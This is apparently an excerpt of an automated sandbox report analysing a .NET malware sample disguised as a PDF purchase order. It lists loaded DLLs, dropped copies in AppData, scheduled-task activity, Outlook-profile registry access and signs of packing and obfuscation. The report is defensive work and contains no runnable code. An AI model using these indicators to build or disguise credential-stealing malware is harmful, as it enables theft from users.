                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeSection loaded: rsaenh.dll
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeSection loaded: cryptbase.dll
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeSection loaded: wbemcomn.dll
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeSection loaded: amsi.dll
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeSection loaded: userenv.dll
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeSection loaded: sspicli.dll
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeSection loaded: rasapi32.dll
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeSection loaded: rasman.dll
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeSection loaded: rtutils.dll
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeSection loaded: mswsock.dll
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeSection loaded: winhttp.dll
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeSection loaded: ondemandconnroutehelper.dll
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeSection loaded: iphlpapi.dll
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeSection loaded: dhcpcsvc6.dll
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeSection loaded: dhcpcsvc.dll
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeSection loaded: dnsapi.dll
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeSection loaded: winnsi.dll
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeSection loaded: rasadhlp.dll
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeSection loaded: fwpuclnt.dll
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeSection loaded: secur32.dll
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeSection loaded: schannel.dll
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeSection loaded: mskeyprotect.dll
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeSection loaded: ntasn1.dll
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeSection loaded: ncrypt.dll
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeSection loaded: ncryptsslp.dll
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeSection loaded: msasn1.dll
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeSection loaded: gpapi.dll
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeSection loaded: ntmarta.dll
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeSection loaded: vaultcli.dll
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeSection loaded: wintypes.dll
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeSection loaded: dpapi.dll
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeSection loaded: edputil.dll
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeSection loaded: windowscodecs.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: mscoree.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: apphelp.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: kernel.appcore.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: version.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: uxtheme.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: windows.storage.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: wldp.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: profapi.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: cryptsp.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: rsaenh.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: cryptbase.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: dwrite.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: windowscodecs.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: amsi.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: userenv.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: msasn1.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: gpapi.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: propsys.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: edputil.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: urlmon.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: iertutil.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: srvcli.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: netutils.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: windows.staterepositoryps.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: sspicli.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: wintypes.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: appresolver.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: bcp47langs.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: slc.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: sppc.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: onecorecommonproxystub.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: onecoreuapcommonproxystub.dll
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dll
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dll
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: mscoree.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: kernel.appcore.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: version.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: uxtheme.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: windows.storage.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: wldp.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: profapi.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: cryptsp.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: rsaenh.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: cryptbase.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: wbemcomn.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: amsi.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: userenv.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: sspicli.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: rasapi32.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: rasman.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: rtutils.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: mswsock.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: winhttp.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: ondemandconnroutehelper.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: iphlpapi.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: dhcpcsvc6.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: dhcpcsvc.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: dnsapi.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: winnsi.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: rasadhlp.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: fwpuclnt.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: secur32.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: schannel.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: mskeyprotect.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: ntasn1.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: ncrypt.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: ncryptsslp.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: msasn1.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: gpapi.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: vaultcli.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: wintypes.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: dpapi.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: mscoree.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: kernel.appcore.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: version.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: uxtheme.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: windows.storage.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: wldp.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: profapi.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: cryptsp.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: rsaenh.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: cryptbase.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: dwrite.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: windowscodecs.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: amsi.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: userenv.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: msasn1.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: gpapi.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: propsys.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: edputil.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: urlmon.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: iertutil.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: srvcli.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: netutils.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: windows.staterepositoryps.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: sspicli.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: wintypes.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: appresolver.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: bcp47langs.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: slc.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: sppc.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: onecorecommonproxystub.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: onecoreuapcommonproxystub.dll
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dll
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dll
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: mscoree.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: kernel.appcore.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: version.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: uxtheme.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: windows.storage.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: wldp.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: profapi.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: cryptsp.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: rsaenh.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: cryptbase.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: wbemcomn.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: amsi.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: userenv.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: sspicli.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: rasapi32.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: rasman.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: rtutils.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: mswsock.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: winhttp.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: ondemandconnroutehelper.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: iphlpapi.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: dhcpcsvc6.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: dhcpcsvc.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: dnsapi.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: winnsi.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: rasadhlp.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: fwpuclnt.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: secur32.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: schannel.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: mskeyprotect.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: ntasn1.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: ncrypt.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: ncryptsslp.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: msasn1.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: gpapi.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: vaultcli.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: wintypes.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: dpapi.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: edputil.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: windowscodecs.dll
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                    Source: Window RecorderWindow detected: More than 3 window changes detected
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\ProfilesJump to behavior
                    Source: z38PO_20248099-1_pdf.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                    Source: z38PO_20248099-1_pdf.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                    Source: z38PO_20248099-1_pdf.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                    Source: Binary string: xaHV.pdbSHA256? source: z38PO_20248099-1_pdf.exe, FrFvspxoHsPs.exe.0.dr, sgxIb.exe.10.dr
                    Source: Binary string: xaHV.pdb source: z38PO_20248099-1_pdf.exe, FrFvspxoHsPs.exe.0.dr, sgxIb.exe.10.dr

                    Data Obfuscation

                    barindex
                    .NET source code contains potential unpacker
                    Source: z38PO_20248099-1_pdf.exe, Form1.cs.Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
                    Source: FrFvspxoHsPs.exe.0.dr, Form1.cs.Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
                    Source: 0.2.z38PO_20248099-1_pdf.exe.7630000.6.raw.unpack, vFQ3EBHyQMQUMUhg1F.cs.Net Code: qEJ4BgbjJ7 System.Reflection.Assembly.Load(byte[])
                    Source: 0.2.z38PO_20248099-1_pdf.exe.5680000.5.raw.unpack, QBy45BY4uMbUQs88Qq.cs.Net Code: KmDc5Q9bs System.Reflection.Assembly.Load(byte[])
                    Source: 0.2.z38PO_20248099-1_pdf.exe.2bd7f58.1.raw.unpack, QBy45BY4uMbUQs88Qq.cs.Net Code: KmDc5Q9bs System.Reflection.Assembly.Load(byte[])
                    Source: 0.2.z38PO_20248099-1_pdf.exe.3e35700.4.raw.unpack, vFQ3EBHyQMQUMUhg1F.cs.Net Code: qEJ4BgbjJ7 System.Reflection.Assembly.Load(byte[])
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeCode function: 0_2_050B5FA8 push eax; retn 050Ah0_2_050B6009
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeCode function: 0_2_050B57ED push edx; iretd 0_2_050B57FB
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeCode function: 0_2_07115FF3 push FFFFFF8Bh; iretd 0_2_07115FFB
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeCode function: 0_2_07116032 push FFFFFF8Bh; iretd 0_2_0711603A
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeCode function: 0_2_07116077 push FFFFFF8Bh; iretd 0_2_0711607F
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeCode function: 10_2_02650C55 push ebx; retf 10_2_02650C52
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeCode function: 10_2_02650C55 push edi; retf 10_2_02650C7A
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeCode function: 10_2_064A212A push ss; ret 10_2_064A212E
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeCode function: 10_2_064AEA70 push es; ret 10_2_064AEA80
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeCode function: 10_2_064A4A9E push ecx; retf 10_2_064A4ACC
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeCode function: 10_2_064AA872 push es; ret 10_2_064AA880
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeCode function: 10_2_064A3E58 push ecx; iretd 10_2_064A3E1C
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeCode function: 11_2_055CFEA8 push eax; mov dword ptr [esp], ecx11_2_055CFEBC
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeCode function: 15_2_0321F8E8 pushad ; retf 15_2_0321F8F1
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeCode function: 15_2_03210C55 push edi; retf 15_2_03210C7A
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 16_2_05EC57F4 push edx; iretd 16_2_05EC57FB
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 16_2_05EC4ECC push eax; retn 05EBh16_2_05EC6009
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 16_2_05EC09E8 push eax; ret 16_2_05EC0A13
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 16_2_05EC09E1 push eax; ret 16_2_05EC0A13
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 19_2_0302F7C8 pushad ; retf 19_2_0302F7D1
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 19_2_03020C55 push edi; retf 19_2_03020C7A
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 24_2_0151F7C8 pushad ; retf 24_2_0151F7D1
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 24_2_01510C55 push edi; retf 24_2_01510C7A
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 24_2_06CC7E88 push es; ret 24_2_06CC7E96
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 24_2_06CC9E82 push es; ret 24_2_06CC9E8E
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 24_2_06CCE4BA push cs; ret 24_2_06CCE4CE
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 24_2_06CC3513 push esp; ret 24_2_06CC352A
                    Source: z38PO_20248099-1_pdf.exeStatic PE information: section name: .text entropy: 7.8170394032595425
                    Source: FrFvspxoHsPs.exe.0.drStatic PE information: section name: .text entropy: 7.8170394032595425
                    Source: 0.2.z38PO_20248099-1_pdf.exe.7630000.6.raw.unpack, KiELhXYqyrVZFhQm9F.csHigh entropy of concatenated method names: 'WQwm6gv9f6', 'XfAmTbGL5G', 'ToString', 'WyPmD9wyUK', 'mvGmn5yPbr', 'QOqm1rPWPD', 'Lcamk37kOf', 'VPNmG6UXO1', 'knPmMWB3Dg', 'siumHKE0rd'
                    Source: 0.2.z38PO_20248099-1_pdf.exe.7630000.6.raw.unpack, LosAFPfFkBtD5oRCm2.csHigh entropy of concatenated method names: 'OWH12OXe09', 'qwJ1wSdLWf', 'kTi1ef5h1I', 'HRb1f3DrKr', 'ij31x1JdkX', 'qiI1VZrNBo', 'dp31m7Q08Y', 'IXl1u93Ups', 'Xn01Kdfyuh', 'Uts17rW8xu'
                    Source: 0.2.z38PO_20248099-1_pdf.exe.7630000.6.raw.unpack, gtyGge5Kctx3uBBAdU.csHigh entropy of concatenated method names: 'mmGBqq7aD', 'xLd2PiFJf', 'GvTw2CtOR', 'jHsssupJ7', 'TTnfMPdIK', 'ykcNXXthO', 'AMSX7KVOArCvgFfP8v', 'GaNwl3hpfBQYCPf6eW', 'XmyuHR8tS', 'zUw7mQdp0'
                    Source: 0.2.z38PO_20248099-1_pdf.exe.7630000.6.raw.unpack, Btk7iA0RH8qsXNA6XR.csHigh entropy of concatenated method names: 'sfDMDZXSRG', 'gG4M1ryWYo', 'J2AMG9Hq8h', 'DVRGqxh6b0', 'iQHGzEuC7h', 'Oa7MliaVfe', 'rKAMpp1CnG', 'NvhM5wW4UV', 'BQrMCVndqT', 'KIkM4j2EFx'
                    Source: 0.2.z38PO_20248099-1_pdf.exe.7630000.6.raw.unpack, mIbugt8UBrxYxJw7d9.csHigh entropy of concatenated method names: 'e3QxR2LZ5N', 'KWSxIZx8w1', 'a63x83fXoI', 'aJHxQhaEwl', 'OwixrAIPvE', 'TgkxdkNH2D', 'JTsxyQXttN', 'nD9xLkyQmb', 'jrmxoWrl8s', 'yYpx0h2YyJ'
                    Source: 0.2.z38PO_20248099-1_pdf.exe.7630000.6.raw.unpack, NQgoNYzj1EmPVwiDCI.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'p28Kjp6YnY', 'rqaKxKWW3m', 'j79KVTmwsh', 'pLCKmwjiqT', 'dGfKum3DUr', 'N5aKKee1CP', 'aFlK7L2fQo'
                    Source: 0.2.z38PO_20248099-1_pdf.exe.7630000.6.raw.unpack, XLS43Ob5jtstyTsgIa.csHigh entropy of concatenated method names: 'rahGZOsbsQ', 'qdoGnCaJBk', 'jS9GkhwoHu', 'rxPGMBi0WX', 'c8LGHvgi9H', 'XhIkcytqrs', 'd5Dkhd2tCB', 'h9JkiX4EoC', 'ziwkABAdQ3', 'v3PkXDGW6x'
                    Source: 0.2.z38PO_20248099-1_pdf.exe.7630000.6.raw.unpack, hyUOVBe1ZWdha1wZaD.csHigh entropy of concatenated method names: 'LyUn8SmLII', 'jxfnQJo71P', 'DTYn9UUcp9', 'bPGnYgBJgt', 'vOancPAkK8', 'VIknhScJ3x', 'Fwnni6G9XV', 'M8MnAara2l', 'uCrnXf754Z', 'GjanqNMkAU'
                    Source: 0.2.z38PO_20248099-1_pdf.exe.7630000.6.raw.unpack, IOlxvM446LtJUjmNsy.csHigh entropy of concatenated method names: 'tL1pMyUOVB', 'gZWpHdha1w', 'BFkp6BtD5o', 'NCmpT2oMv6', 'ylkpx6sXLS', 'd3OpV5jtst', 'XbSnpPPIF5TmoAVZIX', 'NGfINU8wuxOOokBS4X', 'sXkppkyPYZ', 'WMUpC2bwvR'
